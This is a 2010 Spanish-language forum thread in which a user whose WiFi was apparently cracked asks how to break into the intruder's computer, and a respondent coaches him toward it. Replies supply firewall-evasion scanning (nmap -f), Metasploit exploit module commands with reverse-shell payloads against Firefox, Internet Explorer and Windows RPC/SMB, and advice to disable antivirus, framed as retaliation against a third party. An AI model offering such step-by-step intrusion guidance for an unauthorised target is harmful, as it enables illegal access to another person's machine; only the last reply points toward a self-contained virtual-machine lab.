Foro de elhacker.net

Foros Generales => Dudas Generales => Mensaje iniciado por: Soloneo1978 en 10 Abril 2010, 15:54 pm



Título: Acceso a equipos conectados a mi router
Publicado por: Soloneo1978 en 10 Abril 2010, 15:54 pm
Hola a todos. Soy nuevo en este foro y me disculpo por anticipado por las posibles obviedades o imprecisiones.
He advertido que algún equipo de mi entorno a conseguido descifrar la clave de mi router y acceder a él robándome la clave. Supongo que utilizando Aircrack o similar.
La cuestión es la siguiente. Sé que puedo bloquear a este equipo mediante el filtro de la MAC, pero de momento no he querido hacerlo. Prefiero ir un poco más allá y estoy muy interesado en aprender cómo.
Quiero entrar en su equipo. ¿Es posible hacerlo desde mi router? Obviamente tengo su MAC y una dirección IP que supongo que se corresponde con la suya.
Espero no estar diciendo ninguna tontería y que me podáis ayudar...
Un saludo y gracias.


Título: Re: Acceso a equipos conectados a mi router
Publicado por: __Alvaro 2015__ en 11 Abril 2010, 00:15 am
Hola Soloneo1978 los datos que tienes sobre esta/s persona/s los puede/n, o pueden cambiar cuando este/n conectados en cualquier red, en este caso la tuya.  :silbar:

Y para que quieres entrar en su equipo?   :P  Esto seria poco productivo y una muestra de inmadures.  :D

Bloquea el problema y no te estreses  :rolleyes:

Saludos!  ;D


Título: Re: Acceso a equipos conectados a mi router
Publicado por: CloudswX en 11 Abril 2010, 03:03 am
weno....

Pues yo creo que la actitud de Solomeo (¿de donde habra sacado este nick?) esta bien, pues esta obrando por curiosidad y ganas de aprender. Ademas cuando alguien te esta robando el ancho de banda de tu wireless simplemente no puedes blockearlo y punto, pues eso hacen los usuarios comunes. Pero si en cambio te agradan los retos y te apasiona el conocimiento pues a darle.....

Nuestro querido TOTEM tiene razon al decir que la persona que esta usando tu ancho de banda puede cambiar su direccion IP y su MAC  cuantas veces quiera, pero el asunto esta en que cada vez que cambie estas tendra que repetir todo el proceso intrussion. Por el asunto de las tablas ARP que tiene tu router para rutear los paquetes (trafico web, ftp, telnet), para mas informacion sobre ARP: http://es.wikipedia.org/wiki/Address_Resolution_Protocol (http://es.wikipedia.org/wiki/Address_Resolution_Protocol). Es decir cada vez que cambie su direccion IP y su MAC tendra que volver a autentificarse en tu red, lo cual es un poco tedioso si lo esta haciendo con Cain y el Driver de WildPackets.

Lo siguiente es decirte que es un poco complejo explicarte como hacerlo pues no sabria desde que punto partir en la explicacion, seria muy conveniente si respondieras esto:

Tienes algun conocimiento sobre Acunetix, Nmap, Metasploit Framework, programacion en C.....

Si tu respuesta es SI, por demas decirte que un poco de guia te seria muy facil, pero si la respuesta es No ufffffffffffff, entonces comienza por aqui:



1ero.http://www.elhacker.net/in_seguridad_wireless.htm
 (http://www.elhacker.net/in_seguridad_wireless.htm)
                Un tuto muy bueno de nuestro gran "lovalost"

2do.http://foro.portalhacker.net/index.php/topic,45657.0.html
 (http://foro.portalhacker.net/index.php/topic,45657.0.html)                  Buen paper de Nmap por "RaKi0N"

3ero.http://foro.portalhacker.net/index.php/topic,93233.0.html (http://foro.portalhacker.net/index.php/topic,93233.0.html)
Aporte Mixto entre "ShellRoot" y "Rcart" para hacer un buen Intro de MSF (Metasploit Framework).

4to.http://www.e-ghost.deusto.es/docs/SeguridadWiFiInestable2005.pdf (http://www.e-ghost.deusto.es/docs/SeguridadWiFiInestable2005.pdf)
     Un completo texto sobre WiFi: hardware, hacking inalámbrico, vulnerabilidades  detalladas... (Gracias a boc por el enlace).

una vez te empapes de esto te aseguro sera mas facil todo.

xaooooooooooo y Suerteeeeeeeeeeeeeeee




Título: Re: Acceso a equipos conectados a mi router
Publicado por: Soloneo1978 en 11 Abril 2010, 13:50 pm
Gracias Cloudswx. Antes de nada una aclaración sobre mi nick. Es SOLONEO, no SOLOMEO. Supongo que estás acostumbrado a leer muy rápido y de ahí la equivocación.
Bueno, dicho esto...
Me ha parecido muy útil tu respuesta. Efectivamente soy un profano en la materia. Hace tiempo tuve un gran interés en todo lo relacionado con la programación. Hice mis pinitos en Visual Basic, lo cual, antes de que me lo digas, no sirve demasiado.
Por circunstancias no he podido emplear demasiado tiempo en la programación y estoy algo verde. Pero ahora creo que estoy en disposición de aprender.
Voy a empaparme de la información que me remites y espero estar en poco tiempo (o en un poco más) en disposición de darle una pequeña lección.
Tienes razón en una cosa. Es más la curiosidad de saber si puedo hacerlo que la lección en sí.
Si crees que hay algo más que me pueda ser útil, te estaré muy agradecido.
Gracias a los que han leido mi pregunta y a los que han querido perder su tiempo en ayudarme.
Un saludo...


Título: Re: Acceso a equipos conectados a mi router
Publicado por: CloudswX en 11 Abril 2010, 21:33 pm
weno.....

Gracias a los que han leido mi pregunta y a los que han querido perder su tiempo en ayudarme.

Pues este ha sido tu unico fallo, quiero aclararte que estoy seguro que ninguno de los que te respondan en este bello foro puede considerar una "perdida de tiempo" dar una respuesta sobre un tema.  Somos mas que un simple foro, somos una comunidad, y en el momento que te registraste empezaste a formar parte de ella. 

Entonces quizas te preguntes: Y que ganan al responderme??
La respuesta es sencilla...

Gracias Cloudswx.

Saber que te ayudamos en algo y que tu lo agradeces....
Al menos es mi humilde opinion.....

Cualquier cosa avisame......


Título: Re: Acceso a equipos conectados a mi router
Publicado por: Soloneo1978 en 11 Abril 2010, 22:35 pm
Hola de nuevo...

Bueno, he estado leyendo los links que me recomendaste y más o menos estoy entendiéndolo.

Pero tengo ciertas dudas... a ver si soy capaz de expresarme de forma que se me entienda...

Vamos a ver... el equipo que se conecta a mi router tiene la siguiente MAC:
00:13:E8:F5:DF:B1
Y me sale como IP Addr:
192.168.0.15

Más o menos entiendo el funcionamiento de Nmap, solo que cuando abro el símbolo de sistema, los datos que me arroja al escribir "nmap -v -sV 192.168.0.15" son tantos que luego no puedo subir por la ventana para encontrar el famoso puerto 445 y saber si está abierto o no...

Hay algo que no me queda demasiado claro... ¿para qué necesito el Nessus si con Nmap ya puedo averiguar si ese puerto está abierto?

Y por último... me ha surgido un problema al arrancar Metasploit... no estoy seguro de si es normal, pero puesto que me queda mucho por aprender, me gustaría que me ayudaras. Mi antivirus es el Nod32, y cuando se carga la configuración de MSF, me salen no menos de 10 mensajes de "posible troyano" y "modificaciones de archivos". El antivirus los elimina y los pasa a cuarentena. ¿He de desactivar el antivirus al trabajar con MSF?

Y referente a tu mensaje anterior... me siento honrado de pasar a formar parte de esta comunidad y espero, algún día, ser de utilidad para alguien.
Cuando digo "perder el tiempo" me refiero a que me alegra que en esta comunidad haya personas como tú que sabiendo mucho más, ayudan a otros a aprender. Mis conocimientos son mínimos y tal vez mis preguntas simples. A esto me refería.

Un saludo y gracias de antemano Cloudswx.


Título: Re: Acceso a equipos conectados a mi router
Publicado por: skybotter en 11 Abril 2010, 22:46 pm
Hola de nuevo...

Bueno, he estado leyendo los links que me recomendaste y más o menos estoy entendiéndolo.

Pero tengo ciertas dudas... a ver si soy capaz de expresarme de forma que se me entienda...

Vamos a ver... el equipo que se conecta a mi router tiene la siguiente MAC:
00:13:E8:F5:DF:B1
Y me sale como IP Addr:
192.168.0.15

Más o menos entiendo el funcionamiento de Nmap, solo que cuando abro el símbolo de sistema, los datos que me arroja al escribir "nmap -v -sV 192.168.0.15" son tantos que luego no puedo subir por la ventana para encontrar el famoso puerto 445 y saber si está abierto o no...

Hay algo que no me queda demasiado claro... ¿para qué necesito el Nessus si con Nmap ya puedo averiguar si ese puerto está abierto?

Y por último... me ha surgido un problema al arrancar Metasploit... no estoy seguro de si es normal, pero puesto que me queda mucho por aprender, me gustaría que me ayudaras. Mi antivirus es el Nod32, y cuando se carga la configuración de MSF, me salen no menos de 10 mensajes de "posible troyano" y "modificaciones de archivos". El antivirus los elimina y los pasa a cuarentena. ¿He de desactivar el antivirus al trabajar con MSF?

Y referente a tu mensaje anterior... me siento honrado de pasar a formar parte de esta comunidad y espero, algún día, ser de utilidad para alguien.
Cuando digo "perder el tiempo" me refiero a que me alegra que en esta comunidad haya personas como tú que sabiendo mucho más, ayudan a otros a aprender. Mis conocimientos son mínimos y tal vez mis preguntas simples. A esto me refería.

Un saludo y gracias de antemano Cloudswx.

buenas sobre lo del troyano, es normal, desactiva el antivirus y bajate los programas de sitios fiables :) tienes hack toolz en tu pc y obviamente tu antivirus te detecta lo que es realmente

salu2 y suerte

p.d.: siento no aclaratelo todo pero sobre lo que trabajas no entiendo mucho


Título: Re: Acceso a equipos conectados a mi router
Publicado por: CloudswX en 11 Abril 2010, 23:21 pm
Hagamos esto por partes...

Más o menos entiendo el funcionamiento de Nmap, solo que cuando abro el símbolo de sistema, los datos que me arroja al escribir "nmap -v -sV 192.168.0.15" son tantos que luego no puedo subir por la ventana para encontrar el famoso puerto 445 y saber si está abierto o no...

en los tutos que te puse usan el puerto 445 a modo explicativo, es decir no te centres en este solo puerto, pues al ser un puerto para conexiones SMB no siempre correras con la suerte de encontrarlo abierto.

Hay algo que no me queda demasiado claro... ¿para qué necesito el Nessus si con Nmap ya puedo averiguar si ese puerto está abierto?

Pues a difrencia del Nmap el Nexus ademas de escanear un rango de puertos y decirte cuales estan abiertos tambien BUSCA VULNERABILIDADES e incluso en algunos casos las explota con los mismos exploits que trae en su libreria. (Incluso algunos amigos me dicen que el simple hecho de hacer escaneos con Nexus causa inestabilidad en el sistema escaneado).


Y por último... me ha surgido un problema al arrancar Metasploit... no estoy seguro de si es normal, pero puesto que me queda mucho por aprender, me gustaría que me ayudaras. Mi antivirus es el Nod32, y cuando se carga la configuración de MSF, me salen no menos de 10 mensajes de "posible troyano" y "modificaciones de archivos". El antivirus los elimina y los pasa a cuarentena. ¿He de desactivar el antivirus al trabajar con MSF?

Pues es normal que los antivirus detecten herramientas de hacking como virus o posibles amenazas e incluso las bloqueen para que no puedan instalarse, lo que debes hacer es descargarte el MSF de este link http://www.metasploit.com/framework/download (http://www.metasploit.com/framework/download) entonces desactiva tu AV para que puedas instalarlo de forma tranquila, despues de instalado puedes encender tu AV normalmente.

Nota:
Cuando al instalar MSF lo usas por primera vez este dura un tiempo considerable creando el perfil con el que trabajar la primera vez, no creas que esta danado o que se congelo, Noooooo   dejalo que cargue tranquilo.


Título: Re: Acceso a equipos conectados a mi router
Publicado por: Soloneo1978 en 12 Abril 2010, 22:20 pm
(http://r.i.elhacker.net/cache?url=http://img441.imageshack.us/img441/9546/dibujo1dm.png)

Hola de nuevo... He pegado una imágen para ver si me puedes ayudar...
No estoy seguro de si lo que me dice Nmap es que de los 1000 puertos escaneados, ninguno está abierto, lo cual no es nada bueno para mis propósitos...

Por cierto... ¿El objetivo sabe que estoy escaneando sus puertos?

Gracias Skybotter por tu ayuda.

Un saludo.


Título: Re: Acceso a equipos conectados a mi router
Publicado por: CloudswX en 13 Abril 2010, 02:09 am
Weno....

Pues como podras ver en esta imagen te he sombreado las lineas que explican porque aparecen como cerrados los puertos que has escaneado.
(http://lh4.ggpht.com/_hbIw77MN5ro/S8OnRY0D1RI/AAAAAAAAATU/919W3It4sXE/p.jpg)
Es decir... ESTAN FILTRADOS....
Me explico... Nmap esta basado en distintos paquetes de datos de solicitud de eco y de respuesta de eco (ambos definidos en el protocolo de red ICMP) mejor conocidos como "Ping"

es decir el ping va..====> y luego que llega al host determinado entonces vuelve <==== con la informacion, cuando los puertos estan filtrados no significa que estan cerrados, lo que significa es que cuando toca la puerta de cada uno de los 1000 puertos ninguno puede responder pues el firewall le has dicho: "Si alguien llama a la puerta quedense todos callados".

Entonces que hacemos cuando las cosas se ponen dificiles.......
Pues buscarle la vuelta y condimentar un poco el ataque digo... el escaneo seguridad, entonces lo que haras es esto:

agregale "-f " a tu sondeo Nmap

La opción -f hace que el sondeo solicitado (incluyendo los sondeos ping) utilicen paquetes IP fragmentados pequeños. La idea es dividir la cabecera del paquete TCP entre varios paquetes para hacer más facil saltarse los filtros de paquetes condicionados por el firewall.

Dale con eso y me avisas, que poco a poco te ire soltando armas....

Suerte.


Título: Re: Acceso a equipos conectados a mi router
Publicado por: CloudswX en 13 Abril 2010, 04:17 am
Weno...

Me falto contestarte algo....     ;D

Por cierto... ¿El objetivo sabe que estoy escaneando sus puertos?

Pues si el objetivo tiene ciertos conocimientos y tiene herramientas (por ejemplo el "Tcpdump") puede monitorear el trafico que entra y sale, incluso el que se para en su puerta.

 En resumidas cuentas te dire un refran del famoso General Marshall:

"Si tienes al enemigo en tu rango de ataque, recuerda que tu tambien estas en el suyo"

Jejejejeje

Pero como todo funciona a ambos lados de la balanza tu tambien puedes saber si te escanean tus puertos con el mismo "Tcpdump", aca te dejo el link pa que te lo bajes si asi lo deseas....

http://www.tcpdump.org/ (http://www.tcpdump.org/) 

Suerte, y recuerda....
"Que un gran poder conlleva una gran responsabilidad"      ;D



Título: Re: Acceso a equipos conectados a mi router
Publicado por: Soloneo1978 en 13 Abril 2010, 15:57 pm
Jajajaja... Esto se está volviendo realmente divertido...

Cuanto más aprendo más quiero saber...

Ahora no está conectado, pero como tengo un equipo portátil voy a empezar a "jugar".

Gracias y seguro que pronto vuelvo con algún otro problemilla... Un saludo.


Título: Re: Acceso a equipos conectados a mi router
Publicado por: Soloneo1978 en 13 Abril 2010, 17:21 pm
Vamos a ver... he utilizado la opción -f, también --mtu asignándole un valor múltiplo de 8 para fragmentar. He elegido un rango de puertos y siempre el mismo mensaje. He mandado señuelos (aunque esto no tenga que ver con el escaneo de puertos). He probado con --badsum... Todo esto lo he hecho contra mi equipo portátil (en el que no tengo instaladas demasiadas medidas de seguridad) y los puertos siguen siendo filtrados. Esto se está convirtiendo en algo personal... tengo que ser capaz!!

¿Me recomiendas que trabaje desde Linux? Ahora mismo lo estoy haciedo desde el XP, y me llama la atención la siguiente línea que arroja Nmap.

(http://img685.imageshack.us/img685/7259/dibujo2gbl.png)

Es decir: WARNING: Packet fragmentation.......bla, bla.... other than LINUX... bla, bla... may or may not work...

Un saludo.

PD: A este ritmo vamos a crear un tutorial completito de como asaltar un equipo...  :silbar:


Título: Re: Acceso a equipos conectados a mi router
Publicado por: CloudswX en 14 Abril 2010, 00:21 am

Primero decirte que ese argumento esta muy pobre, es decir solo con la opcion " -f " no estaras haciendo un escaneo completo, pues como te dije ese comando solo tiene utilidad para condimentar un sondeo previo (con puertos filtrados).

(http://lh5.ggpht.com/_hbIw77MN5ro/S8TnJFqQCfI/AAAAAAAAAUM/AUGSFLSYtxU/p.jpg)

El asunto es que con los puertos filtrados es un poco mas dificil jugar nuestro juego, pero a ver... usemos el sentido comun.

1ero. Por logica si te esta robando tu ancho de banda lo debe usar para conectarse a internet, por ende debe tener el puerto 80 TCP abierto... (tu ponte a imaginar cuales otros servicios de correr, MSN por ejemplo que usa los puertos 6891-6900, 13324, 13325, 1503, 1863).

2do. Te has fijado si alguna otra IP se ha registrado en tu router?

3ero. Porque no pruebas con el Nmap pero en su version grafica, es mas letal pues tiene ciertos profiles de sondeos por default que son una BOMBAAAA....

(http://nmap.org/zenmap/images/zenmap-no-648x700.png)

Cualquier cosa avisame....





Título: Re: Acceso a equipos conectados a mi router
Publicado por: Soloneo1978 en 14 Abril 2010, 16:54 pm
Hola...
Te agradezco mucho tu anterior respuesta. Estoy unsando Zenmap y desde luego es más intuitivo y, aparentemente más potente. Después de probar alguna que otra opción, he podido encontrar algún que otro puerto abierto.
Como bien suponías, el puerto 80 de mi equipo, el que estoy utilizando para aprender, está abierto, junto con el 53 (domain), 22 (ssh), 5560 ( isqlplus?) y 5666 (tcpwrapped).

Me he centrado en buscar sploits para estos puertos. En varios sitios se habla de un sploit para el puerto 80 (ie_xp_pfv_metafile.pm) pero por más que busco soy incapaz de encontrarlo para descargarlo.

Del resto de puertos no he encontrado demasiada información.

Por cierto, trasteando con Metasploit, me ha llamado la atención que el puerto 65535 estuviera abierto, pues lo abrí yo en el router para un gestor de descargas torrent (Azureus).

Perdona mi ignorancia, pero si abro en el router el puerto 445, no consigo nada verdad? (Dame la bien merecida colleja).

Un saludo y gracias.


Título: Re: Acceso a equipos conectados a mi router
Publicado por: CloudswX en 14 Abril 2010, 22:26 pm
Weno...

A decir verdad ya te estoy tomando un cariño paternal...      :laugh:        :laugh:

Me he centrado en buscar sploits para estos puertos. En varios sitios se habla de un sploit para el puerto 80 (ie_xp_pfv_metafile.pm) pero por más que busco soy incapaz de encontrarlo para descargarlo.

Pues si ya tienes el Metasploit instalado aqui te dejo el nombre de dos buenos exploits, uno para el IE y otro para el Firefox.

FIREFOX

Este módulo explota una vulnerabilidad de corrupción de memoria en el navegador Mozilla Firefox.
Código:
msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) > set PAYLOAD generic/shell_reverse_tcp


Internet Explorer

Código:
msf > use exploit/windows/browser/ms03_020_ie_objecttype
msf exploit(ms03_020_ie_objecttype) > set PAYLOAD generic/shell_reverse_tcp

Recuerda buen usar el comando: "show options" de metasploit para que veas los requerimientos de cada exploit. Tambien recuerda asignar todas las variables requeridas de cada exploit con el comando "set", Ej:
"set LHOST"
"set RHOST"
"set RPORT"
set LPORT"
y cuantas cosas mas haya que setear, porque cada exploit tiene opciones diferentes.

Cuidate men...

Si ultimamente ves que no te contesto es que no tengo tiempo pues me toca trabajar fuerte en este fin de semana.

Suerte


Título: Re: Acceso a equipos conectados a mi router
Publicado por: Soloneo1978 en 16 Abril 2010, 14:51 pm
Eres mi maestro... :laugh:

Vale, voy a intentar no ser tan "dependiente" de tus sabios consejos e intentar ir trasteando con lo que voy aprendiendo.

Por cierto, no me respondiste respecto a lo de instalarme el Linux... ¿tiene alguna ventaja con respecto a lo que nos ocupa? Y bueno... ¿tiene alguna ventaja en general?

Saludos y traqui... lo primero es el curro... ;D


Título: Re: Acceso a equipos conectados a mi router
Publicado por: Soloneo1978 en 20 Abril 2010, 15:50 pm
Hola de nuevo... Espero que el fin de semana fuera bien...

Te traigo buenas nuevas y por supuesto nuevas dudas que espero que me puedas resolver...

Antes de nada decirte que me he instalado al fin el UBUNTU 9.10 y, aunque de momento estoy algo verde, a cabezón no me gana nadie y voy a seguir con él. De hecho estoy intentando aprender sobre la programación en C++ para adquirir algo de soltura en la terminal.

Bueno, al tema.

Jugando con el equipo que tengo en casa, he encontrado un puerto abierto y vulnerable. Este es el 135. Cargo el exploit ms03_026_dcom y defino el payload con sus correspondientes LHOST, RHOST y RPORT.

Todo marcha bien salvo que me sale el siguiente error:
Exploit failed: Invalid packet. DCERPC response packet is incomplete.

Todo esto lo hago desde la terminal del Ubuntu...
Intento actualizar MSF con "sudo svn update" pero no pasa nada...

Espero puedas ayudarme y gracias de antemano.
Un saludo.


Título: Re: Acceso a equipos conectados a mi router
Publicado por: CloudswX en 20 Abril 2010, 17:58 pm
Weno....

Como va todo por alla?

Pues te recomiendo que cargues tu exploit, configures todas tus variables y luego hagas un SHOW OPTIONS y me mandes un printscreen.

Tambien verificate que version de windows estas atacando, pues si te fijas en el TARGET de ese exploit solo soporta los windows XP en espa;ol y por debajo del SP2.

Pruebate este otro a ver que sucede:
Citar
msf > use exploit/windows/dcerpc/ms05_017_msmq

Es una variante del que estas usando actualmente.


Título: Re: Acceso a equipos conectados a mi router
Publicado por: Soloneo1978 en 29 Abril 2010, 22:10 pm
Lo siento, he estado bastante ocupado estos días...

Estoy teniendo ciertos progresos que voy a compartir contigo, pero desde el equipo en el que me encuentro no puedo mostrártelos...

De todas formas, si quieres dejarme alguna nota que creas que me puede ser de utilidad, será, como siempre, muy bien recibida...

Estoy trabajando con temas relacionados con los puertos 80, 135, 139, 2105... todos ellos abiertos y sobre Windows Vista...

Un saludo y gracias de antemano...


Título: Re: Acceso a equipos conectados a mi router
Publicado por: CloudswX en 29 Abril 2010, 23:24 pm
Que bueno man, por ahora ando mas rapido que Clark Kent, pero mas adelante me sentare con calma a leer y buscar la forma de ayudarte.

Duro con ellos tigre.

 ;-)


Título: Re: Acceso a equipos conectados a mi router
Publicado por: Soloneo1978 en 2 Junio 2010, 11:23 am
Hola de nuevo.... He estado ciertamente ocupado y no he tenido tiempo de compartir con ustedes mis progresos y, por supuesto, nuevas dudas...

Veamos, en el equipo de mi casa, he encontrado una vulnerabilidad "Higth". Me la arroja el Nessus y es la 42411 Microsoft Windows SMB Shares Unprivileged Access, en el puerto 445 tcp.

Intenté explotar la vulnerabilidad con MSF usando el exploit MS08_067_netapi, pero no dio resultado. He estado probando con otros exploits del grupo SMB, pero nada...

He estado indagando por la red, pero no encuentro nada de provecho. Me cuesta pensar que nadie ha sido capaz de explotar esta vulnerabilidad. Me gustaría que alguien me ayudara...

Un saludo y gracias de antemano...



Título: Re: Acceso a equipos conectados a mi router
Publicado por: wACtOr en 2 Junio 2010, 17:10 pm
Buenas, veo que tenes ganas de aprender.

Te voy a comentar que el ataque al puerto 445 en windows Vista (creo) que no funciona, debido a que funciona con SMB v2. De hecho ayer mismo estuve buscando exploits para smb2 y solo encontre uno para hacer D.O.S (si no recuerdo mal).

Yo te voy a recomendar que en el equipo que usas de "victima" te instales una maquina virtual con un windows XP. Bajate el VMWare WorkStation y (si no lo tienes ya) una imagen ISO de un windows XP.

Instalar y configurar una maquina virtual.
http://www.mygeekside.com/?p=21

Esto es bastante recomendable ya que si te cargas tu equipo de pruebas, te tocara volver a instalar todo, configurar todo, etc.
Sin embargo con una maquina virtual, simplemente vuelves a reinstalar windows y a seguir rompiendolo.

Espeo haerte ayudado.

Un Saludo